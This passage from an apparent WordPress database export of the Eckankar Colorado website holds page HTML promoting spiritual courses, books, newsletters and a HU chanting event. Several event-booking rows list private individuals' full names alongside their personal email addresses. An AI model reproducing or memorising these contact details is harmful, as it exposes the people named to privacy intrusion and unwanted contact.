data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269403\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269404\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269405\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Home','','inherit','closed','closed','','7160-revision-v1','','','2023-11-21 09:29:15','2023-11-21 16:29:15','',7160,'https://eckankar-colorado.org/?p=269411',0,'revision','',0),(267117,2,'2022-09-01 10:46:44','2022-09-01 16:46:44','','ocean-3','','inherit','closed','closed','','ocean-3','','','2022-09-01 10:46:44','2022-09-01 16:46:44','',266942,'https://eckankar-colorado.org/wp-content/uploads/2022/09/ocean-3.jpg',0,'attachment','image/jpeg',0),(269410,0,'2023-11-21 02:19:55','2023-11-21 09:19:55','','','','publish','closed','closed','','269410','','','2023-11-21 02:19:55','2023-11-21 09:19:55','',0,'https://eckankar-colorado.org/nf_sub/269410/',0,'nf_sub','',0),(267131,1000043,'2022-09-04 10:30:00','2022-09-04 16:30:00','','Gordon Garland - huusinger@comcast.net','','publish','closed','closed','','gordon-garland-huusingercomcast-net-2','','','2022-09-04 10:30:00','2022-09-04 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267131',0,'mec-books','',0),(267132,1000045,'2022-09-04 10:30:00','2022-09-04 16:30:00','','Keli Kinsella - kelik0@me.com','','publish','closed','closed','','keli-kinsella-kelik0me-com','','','2022-09-04 10:30:00','2022-09-04 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267132',0,'mec-books','',0),(267133,1000015,'2022-09-20 19:00:00','2022-09-21 01:00:00','','Linda Mary - lindamaryk@hotmail.com','','publish','closed','closed','','linda-mary-lindamarykhotmail-com-8','','','2022-09-20 19:00:00','2022-09-21 01:00:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267133',0,'mec-books','',0),(268391,0,'2023-04-14 08:05:47','2023-04-14 14:05:47','','','','publish','closed','closed','','268391','','','2023-04-14 08:05:47','2023-04-14 14:05:47','',0,'https://eckankar-colorado.org/nf_sub/268391/',0,'nf_sub','',0),(268468,1000081,'2023-05-14 10:30:00','2023-05-14 16:30:00','','Eileen Joy - eileenjoy12@gmail.com','','publish','closed','closed','','eileen-joy-eileenjoy12gmail-com-4','','','2023-05-14 10:30:00','2023-05-14 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268468',0,'mec-books','',0),(268469,1000081,'2023-05-14 10:30:00','2023-05-14 16:30:00','','Eileen Joy - eileenjoy12@gmail.com','','publish','closed','closed','','eileen-joy-eileenjoy12gmail-com-5','','','2023-05-14 10:30:00','2023-05-14 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268469',0,'mec-books','',0),(268377,0,'2023-04-08 15:43:42','2023-04-08 21:43:42','','','','publish','closed','closed','','268377','','','2023-04-08 15:43:42','2023-04-08 21:43:42','',0,'https://eckankar-colorado.org/nf_sub/268377/',0,'nf_sub','',0),(268378,1000078,'2023-04-09 10:30:00','2023-04-09 16:30:00','','Agnes Hynes - amhynes7@msn.com','','publish','closed','closed','','agnes-hynes-amhynes7msn-com','','','2023-04-09 10:30:00','2023-04-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268378',0,'mec-books','',0),(269248,0,'2023-10-24 10:10:19','2023-10-24 16:10:19','','','','publish','closed','closed','','269248','','','2023-10-24 10:10:19','2023-10-24 16:10:19','',0,'https://eckankar-colorado.org/nf_sub/269248/',0,'nf_sub','',0),(269249,0,'2023-10-24 10:13:44','2023-10-24 16:13:44','','','','publish','closed','closed','','269249','','','2023-10-24 10:13:44','2023-10-24 16:13:44','',0,'https://eckankar-colorado.org/nf_sub/269249/',0,'nf_sub','',0),(269250,0,'2023-10-24 10:14:14','2023-10-24 16:14:14','','','','publish','closed','closed','','269250','','','2023-10-24 10:14:14','2023-10-24 16:14:14','',0,'https://eckankar-colorado.org/nf_sub/269250/',0,'nf_sub','',0),(269251,0,'2023-10-24 10:16:09','2023-10-24 16:16:09','','','','publish','closed','closed','','269251','','','2023-10-24 10:16:09','2023-10-24 16:16:09','',0,'https://eckankar-colorado.org/nf_sub/269251/',0,'nf_sub','',0),(269252,0,'2023-10-24 11:36:38','2023-10-24 17:36:38','','','','publish','closed','closed','','269252','','','2023-10-24 11:36:38','2023-10-24 17:36:38','',0,'https://eckankar-colorado.org/nf_sub/269252/',0,'nf_sub','',0),(269253,0,'2023-10-25 11:42:47','2023-10-25 17:42:47','','','','publish','closed','closed','','269253','','','2023-10-25 11:42:47','2023-10-25 17:42:47','',0,'https://eckankar-colorado.org/nf_sub/269253/',0,'nf_sub','',0),(269254,0,'2023-10-25 11:48:49','2023-10-25 17:48:49','','','','publish','closed','closed','','269254','','','2023-10-25 11:48:49','2023-10-25 17:48:49','',0,'https://eckankar-colorado.org/nf_sub/269254/',0,'nf_sub','',0),(269098,2,'2023-09-18 11:35:41','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 50px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Raleway\'; font-weight: 500; font-size: 25px; color: #595959;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 50px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; color: #595959;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">ECKSoulAdventure.org offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','New ECK Model – For You From Eckankar Element -1/12/2023','','draft','closed','closed','','','','','2023-09-18 11:35:41','0000-00-00 00:00:00','',0,'https://eckankar-colorado.org/?post_type=bg_block&p=269098',0,'bg_block','',0),(269244,0,'2023-10-23 12:48:59','2023-10-23 18:48:59','','','','publish','closed','closed','','269244','','','2023-10-23 12:48:59','2023-10-23 18:48:59','',0,'https://eckankar-colorado.org/nf_sub/269244/',0,'nf_sub','',0),(269107,2,'2023-09-21 19:10:19','2023-09-22 01:10:19','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Access the God-Current with HU</span></strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, an ancient mantra and divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will chant HU for 15 to 20 minutes, have a few minutes of quiet contemplation followed by spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Find out more about HU at&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/296207143/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','How to Enliven Every Aspect of Your Life','','publish','closed','closed','','223','','','2023-09-21 19:10:19','2023-09-22 01:10:19','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269107',0,'mec-events','',0),(269109,2,'2023-09-21 19:19:00','2023-09-22 01:19:00','<div class=\"boldgrid-section\">\r\n<div 